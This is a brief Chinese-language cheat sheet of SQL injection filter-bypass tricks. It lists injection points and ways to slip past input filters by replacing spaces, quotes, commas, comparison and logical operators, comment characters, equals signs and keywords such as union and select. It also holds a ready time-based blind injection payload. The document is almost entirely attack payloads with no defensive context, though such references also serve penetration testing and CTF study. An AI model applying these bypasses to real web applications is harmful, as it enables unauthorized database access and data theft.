注入类型:
GET
POST
COOKIE
HEADER
注入绕过技巧:
order by绕过:
select * from yz limit 1,1 into @a,@b,@c; 几行几个@
空格绕过:
两个空格替换一个空格
%20、%09、%0a、%0b、%0c、%0d、%a0、%00、/**/、/*!*/ # 替换空格
()绕过空格 select(user()); # MySQL可用,一般用于基于时间盲注:?id=1%27and(sleep(ascii(mid(database()from(1)for(1)))=109))%23
引号绕过:
十六进制绕过:select column_name from information_schema.tables where table_name=0x7573657273 # users
逗号绕过
join替换逗号: select * from (select 1)a join (select 2)b # 用于select
like替换逗号: select ascii(mid(user(),1,1))=80 ==> select user() like 'r%' # 用于布尔盲注
offset替换逗号: select * from news limit 1 offset 0 # 用于limit
<>绕过:
greatest(ascii(substr(database(),1,1)),64)=64; # 前者和64比大小输出大的,然后判断是不是等于64,以此进行二分法,类比least()
select 3 between 1 and 5; # between and 返回这之间的数,左边表达式可判断3是不是在1-5之内,返回值为0/1。
and or xor not绕过:
and=&& or=|| xor=| not=!
#绕过:
%23 -- l
等号绕过:
换成<>或者用like,如上,或者rlike、regexp
union、select、where绕过:
u/**/nion、sel/**/ect、wh/**/ere